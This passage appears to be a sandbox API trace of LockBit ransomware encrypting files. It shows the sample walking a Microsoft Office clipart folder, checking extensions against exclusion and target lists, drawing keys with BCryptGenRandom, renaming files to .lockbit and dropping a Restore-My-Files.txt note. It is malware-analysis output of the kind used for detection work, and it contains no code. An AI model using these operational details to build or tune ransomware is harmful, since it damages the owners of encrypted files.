lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01607U.BMP") returned 1 [0168.232] lstrcmpiW (lpString1="ntldr", lpString2="PH01607U.BMP") returned -1 [0168.232] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01607U.BMP") returned -1 [0168.232] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01607U.BMP") returned -1 [0168.232] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01607U.BMP") returned -1 [0168.232] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01607U.BMP") returned 1 [0168.232] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01607U.BMP") returned -1 [0168.232] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.232] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01607U.BMP") returned=".BMP" [0168.232] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.232] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.232] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.233] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.233] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.233] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.233] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.233] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.233] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.233] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.233] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.233] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.233] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.233] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.233] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.233] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01607U.BMP.lockbit") returned 72 [0168.233] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01607U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01607u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0168.234] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.234] malloc (_Size=0x40068) returned 0x3e70008 [0168.234] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=31968) returned 1 [0168.234] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0168.234] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.235] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0168.235] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0168.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01607U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01607U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.238] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.238] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.239] free (_Block=0x1fa2ed8) [0168.239] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01607U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.239] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.239] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.239] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35a3dc00, ftCreationTime.dwHighDateTime=0x1bd4e60, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35a3dc00, ftLastWriteTime.dwHighDateTime=0x1bd4e60, nFileSizeHigh=0x0, nFileSizeLow=0x9abe, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01931J.JPG", cAlternateFileName="")) returned 1 [0168.239] lstrcmpiW (lpString1=".", lpString2="PH01931J.JPG") returned -1 [0168.240] lstrcmpiW (lpString1="..", lpString2="PH01931J.JPG") returned -1 [0168.240] PathFindExtensionW (pszPath="PH01931J.JPG") returned=".JPG" [0168.240] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0168.240] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0168.240] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0168.240] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0168.240] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0168.240] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0168.240] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0168.240] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0168.240] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0168.240] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0168.240] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0168.240] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0168.240] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0168.240] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0168.240] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0168.240] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0168.240] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0168.240] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0168.240] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0168.240] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0168.240] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0168.240] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0168.240] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0168.241] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.241] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0168.241] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0168.241] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0168.241] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0168.241] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0168.241] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0168.241] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.241] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0168.241] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0168.241] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0168.242] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01931J.JPG") returned 1 [0168.242] lstrcmpiW (lpString1="ntldr", lpString2="PH01931J.JPG") returned -1 [0168.242] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01931J.JPG") returned -1 [0168.242] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01931J.JPG") returned -1 [0168.242] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01931J.JPG") returned -1 [0168.242] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01931J.JPG") returned 1 [0168.242] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01931J.JPG") returned -1 [0168.242] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.242] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01931J.JPG") returned=".JPG" [0168.242] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0168.242] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0168.242] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0168.242] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0168.242] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0168.242] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0168.242] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0168.242] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0168.242] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0168.242] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0168.242] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0168.242] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0168.242] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0168.242] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0168.242] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0168.243] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0168.243] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0168.243] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0168.243] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0168.243] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0168.243] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0168.243] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0168.243] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0168.243] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0168.243] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0168.243] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0168.243] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0168.243] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0168.243] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01931J.JPG.lockbit") returned 72 [0168.243] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01931J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01931j.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0168.244] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.244] malloc (_Size=0x40068) returned 0x3ef0008 [0168.244] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=39614) returned 1 [0168.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0168.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.245] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0168.245] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0168.372] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01931J.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01931J.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.372] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.373] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0168.374] free (_Block=0x1fa2ed8) [0168.374] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01931J.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.374] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.374] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.374] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x451e, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02028K.JPG", cAlternateFileName="")) returned 1 [0168.374] lstrcmpiW (lpString1=".", lpString2="PH02028K.JPG") returned -1 [0168.374] lstrcmpiW (lpString1="..", lpString2="PH02028K.JPG") returned -1 [0168.375] PathFindExtensionW (pszPath="PH02028K.JPG") returned=".JPG" [0168.375] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0168.375] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0168.375] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0168.375] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0168.375] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0168.375] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0168.375] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0168.375] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0168.375] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0168.375] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0168.375] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0168.375] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0168.375] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0168.375] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0168.376] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0168.376] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0168.376] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0168.376] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0168.376] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.376] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0168.376] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02028K.JPG") returned 1 [0168.376] lstrcmpiW (lpString1="ntldr", lpString2="PH02028K.JPG") returned -1 [0168.376] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02028K.JPG") returned -1 [0168.376] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02028K.JPG") returned -1 [0168.376] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02028K.JPG") returned -1 [0168.376] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02028K.JPG") returned 1 [0168.376] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02028K.JPG") returned -1 [0168.376] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.376] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02028K.JPG") returned=".JPG" [0168.376] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0168.376] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0168.376] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0168.377] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0168.377] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0168.377] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0168.377] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0168.377] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0168.377] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0168.377] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0168.377] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0168.377] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0168.377] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0168.377] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0168.377] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0168.377] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0168.377] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0168.377] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0168.377] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0168.377] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0168.377] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0168.377] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0168.377] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0168.377] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0168.377] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0168.377] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0168.377] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0168.377] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02028K.JPG.lockbit") returned 72 [0168.377] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02028K.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02028k.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0168.378] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.378] malloc (_Size=0x40068) returned 0x3df0008 [0168.379] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=17694) returned 1 [0168.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0168.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0168.380] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0168.389] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02028K.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02028K.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.389] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.389] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.390] free (_Block=0x1fa2ed8) [0168.390] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02028K.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.390] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.390] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft 